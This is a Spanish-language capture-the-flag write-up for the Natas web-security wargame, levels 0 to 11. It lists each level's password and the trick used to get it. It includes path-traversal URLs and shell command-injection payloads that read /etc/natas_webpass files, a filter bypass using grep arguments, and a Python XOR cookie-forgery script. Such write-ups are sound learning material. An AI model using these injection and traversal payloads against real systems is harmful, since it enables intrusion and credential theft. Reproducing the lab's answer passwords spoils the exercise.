* Levels
- Las contraseñas son para acceder al siguiente nivel. Es decir, en Level 1 -> 2, estás hayando la contraseña para natas3
** Level 0
1. Ingresa a la página y fíjate en el source
*** Contraseña
#+begin_src 
0nzCigAq7t2iALyvU9xcHlYN4MlkIwlq
#+end_src
** Level 0 -> 1
1. De forma similar, está en el source code visible en el panel de desarrollador
*** Contraseña
#+begin_src 
TguMNxKo1DSa1tujBLuZJnDUlCcUAPlI
#+end_src
** Level 1 -> 2
1. El código fuente muestra que accede a ~files/pixel.png~.
2. Se puede acceder al directorio files/
3. En el directorio files/ se tiene users.txt con la contraseña a Natas3
*** Contraseña
#+begin_src 
3gqisGdR0pjm6tpkDKdIWO2hSvchLeYH
#+end_src
** Level 2 -> 3
1. Lo clásico, revisa ~robots.txt~
2. En ~robots.txt~ hay un directorio excluido, ~s3cr3t~
3. En el directorio excluido está la contraseña
*** Contraseña
#+begin_src 
QryZXc2e0zahULdHrtHxzyYkj59kUxLQ
#+end_src
** Level 3 -> 4
1. Accediendo al sitio, te muestra el siguiente mensaje:
  #+begin_src 
Access disallowed. You are visiting from "" while authorized users should come only from "http://natas5.natas.labs.overthewire.org/"
  #+end_src 
2. Me da la idea de ~Referer~
3. Sip sí era ~Referer~. Solo escríbelo en Postman
*** Contraseña
#+begin_src 
0n35PkggAPm2zbEpOU802c0x0Msn1ToK
#+end_src
** Level 4 -> 5
1. Ingresando al nivel te muestra el mensaje
  #+begin_src 
 Access disallowed. You are not logged in
  #+end_src 
2. El sitio tiene cookies. Solo revisando el almacenamiento en la consola y cambiando su valor a 1 te permite ingresar.
*** Contraseña
#+begin_src 
0RoJwHdSKWFTYR5WuiAewauSuNaBXned
#+end_src
** Level 5 -> 6 
1. Viendo el source, se ve que se accede a un secreto en ~includes/secret.inc~
2. Simplemente se accede a este mediante el URL y se obtiene el secreto
3. Enviando el secreto, se tiene la contraseña
*** Contraseña
#+begin_src 
bmg8SvU1LizuWjx3y7xkNERkHxGre0GS
#+end_src
** Level 6 -> 7
1. Ingresando se tienen dos pestañas, home y about
2. Se acceden mediante queries PHP
  #+begin_src 
http://natas7.natas.labs.overthewire.org/index.php?page=home
  #+end_src 
3. Simplemente accedemos a la contraseña
  #+begin_src 
http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8
  #+end_src
*** Contraseña
#+begin_src 
xcoXLmzMkoIP9D7hlgPlh9XD7OgLAe5Q
#+end_src
** Level 7 -> 8 
1. Otro input secret
2. El secreto está en texto plano en el sitio, pero codificado
  #+begin_src php
<?
$encodedSecret = "3d3d516343746d4d6d6c315669563362";

function encodeSecret($secret) {
    return bin2hex(strrev(base64_encode($secret)));
}

if(array_key_exists("submit", $_POST)) {
    if(encodeSecret($_POST['secret']) == $encodedSecret) {
    print "Access granted. The password for natas9 is <censored>";
    } else {
    print "Wrong secret";
    }
}
?>
  #+end_src 
3. Hagamo un script chiquito
  #+begin_src python :results output
import base64

encoded_secret = "3d3d516343746d4d6d6c315669563362"

def decode_secret(secret):
   bytes_from_hex = bytes.fromhex(secret) 
   decoded_string = bytes_from_hex.decode()
   inverted_string = decoded_string[::-1]
   decoded_final = base64.b64decode(inverted_string)
   return decoded_final.decode()

print(decode_secret(encoded_secret))
  #+end_src 

  #+RESULTS:
  : oubWYf2kBq
  
*** Contraseña
ZE1ck82lmdGIoErlhQgWND6j2Wzz6b6t

** Level 8 -> 9
1. El código es algo extraño, te permite buscar palabras en un diccionario
#+begin_src php
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
#+end_src   
2. Entonces ~$key~ se pasa como parámetro a un comando shell -> RCE
#+begin_src 
; ls ../../../../etc/natas_webpass #
; cat ../../../../etc/natas_webpass/natas10 #
#+end_src
*** Contraseña
t7I5VHvpa14sJTUGV0cbEsbYfFP2dmOu

** Level 9 -> 10
1. Mismo que el anterior, pero filtra caracteres
   #+begin_src 
if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
   #+end_src 
2. Está filtrando ~;~, ~|~ y ~&~.
3. Ok bueno tan solo nos aprovechamos de cómo funciona grep.
4. Pasamos un argumento para que lo lea en ~/etc/natas_webpass/natas1~ y en ~dictionary.txt~
#+begin_src 
a ../../../../etc/natas_webpass/natas11
#+end_src
Todo el comando será
#+begin_src 
grep -i a ../../../../etc/natas_webpass/natas11 dictionary.txt
#+end_src
*** Contraseña
UJdqkK1pTu6VLt9UHWAgRZz6sVUZ3lEk

** Level 10 -> 11
1. El código vulnerable permite generar cookies de forma sencilla para descifrar la clave.
2. Primero, se crea una cookie sin clave
  #+begin_src php
<?php
$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");
echo base64_encode(json_encode($defaultdata));
?>
  #+end_src 
 #+begin_src 
 eyJzaG93cGFzc3dvcmQiOiJubyIsImJnY29sb3IiOiIjZmZmZmZmIn0= 
 #+end_src 
3. XOR entre la cookie sin clave y con la clave.
#+begin_src python
import base64
import json
import itertools

with_key = base64.b64decode("HmYkBwozJw4WNyAAFyB1VUcqOE1JZjUIBis7ABdmbU1GIjEJAyIxTRg=")
no_key = base64.b64decode("eyJzaG93cGFzc3dvcmQiOiJubyIsImJnY29sb3IiOiIjZmZmZmZmIn0=")
key = bytes([_a ^ _b for _a, _b in zip(with_key, no_key)])[:4]

cookie = {"showpassword": "yes", "bgcolor":"#ffffff"}
key_cycle = itertools.cycle(key)
encrypted_json = bytes([_a ^ next(key_cycle) for _a in json.dumps(cookie).encode()])
return base64.b64encode(encrypted_json).decode()
#+end_src

#+RESULTS:
: HmYkBwozJw4WNyAAFyB1VUVmLgoWZntPRyYwDAooOB1HfndNRiIxCQMiMU0Y

4. Clave: eDWo
*** Contraseña
yZdkjAYZRd3R7tq7T5kXMjMJlOIkzDeB




